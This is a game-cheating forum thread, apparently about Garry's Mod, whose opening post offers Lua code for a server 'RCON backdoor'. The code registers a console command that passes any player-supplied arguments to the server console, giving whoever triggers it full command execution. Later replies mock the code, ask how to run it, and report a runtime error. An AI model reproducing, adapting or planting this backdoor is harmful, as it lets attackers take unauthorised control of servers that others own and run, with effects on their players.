Results 1 to 7 of 7
  1. #1
    efeaydin's Avatar
    Join Date
    Mar 2017
    Gender
    male
    Location
    Turkey
    Posts
    34
    Reputation
    10
    Thanks
    187

    Simple Lua RCON Backdoor

    Simple Lua RCON Backdoor

    Usage: backdoor [command]
    Example Usage: backdoor sv_gravity 0

    Code:
    Code:
    concommand.Add( "backdoor", function( ply, cmd, args )    
        command = ""
        for k,v in pairs(args) do
            if table.getn(args) == 1 then
                command = v
            else
                command = command .. " " .. v
            end
        end
        game.ConsoleCommand(command .. "\n")
    end )

  2. #2
    Cyaegha's Avatar
    Join Date
    Aug 2016
    Gender
    male
    Posts
    536
    Reputation
    17
    Thanks
    526
    this is cancer in text form

  3. The Following User Says Thank You to Cyaegha For This Useful Post:

    Alainx277 (07-05-2017)

  4. #3
    efeaydin's Avatar
    Join Date
    Mar 2017
    Gender
    male
    Location
    Turkey
    Posts
    34
    Reputation
    10
    Thanks
    187
    Quote Originally Posted by Cyaegha View Post
    this is cancer in text form
    https://paste.ubuntu.com/25010886/

  5. #4
    _Kuno's Avatar
    Join Date
    Nov 2016
    Gender
    male
    Posts
    17
    Reputation
    10
    Thanks
    1
    My Mood
    Asleep
    Garbage shit, you don't need to put simple as title since we can see by ourself how shit it is with our eyes
    Last edited by _Kuno; 07-05-2017 at 02:25 PM.

  6. #5
    jmantechn0's Avatar
    Join Date
    Sep 2017
    Gender
    male
    Posts
    3
    Reputation
    10
    Thanks
    0
    were do i run this code? the console

  7. #6
    tikene's Avatar
    Join Date
    Jun 2017
    Gender
    male
    Posts
    94
    Reputation
    10
    Thanks
    39
    were do i run this code? the console

  8. #7
    EgorKa1020's Avatar
    Join Date
    Jun 2016
    Gender
    male
    Posts
    52
    Reputation
    10
    Thanks
    4
    help

    [ERROR] RunString:10: attempt to call field 'ConsoleCommand' (a nil value)
    1. unknown - RunString:10
    2. unknown - lua/includes/modules/concommand.lua:54

Similar Threads

  1. [Release] TLua V1 (1.2.4.1) - A Simple Lua Integration
    By lexkymbeth in forum Terraria Hacks
    Replies: 7
    Last Post: 08-04-2015, 05:36 PM
  2. [Release] Simple lua Hex Compiler and Decompiler!
    By suchisgood in forum Garry's Mod Hacks & Cheats
    Replies: 5
    Last Post: 03-29-2015, 04:39 AM
  3. [Help] Help a scrub like me with simple lua?
    By frferewfrwth in forum Garry's Mod Discussions & Help
    Replies: 4
    Last Post: 08-03-2014, 04:51 PM
  4. [Help Request] Simple Lua or dll namestealer
    By qwerty3322 in forum Garry's Mod Discussions & Help
    Replies: 5
    Last Post: 07-01-2014, 01:04 PM
  5. Simple LUA script
    By IV2B in forum Garry's Mod Discussions & Help
    Replies: 6
    Last Post: 09-05-2013, 05:49 PM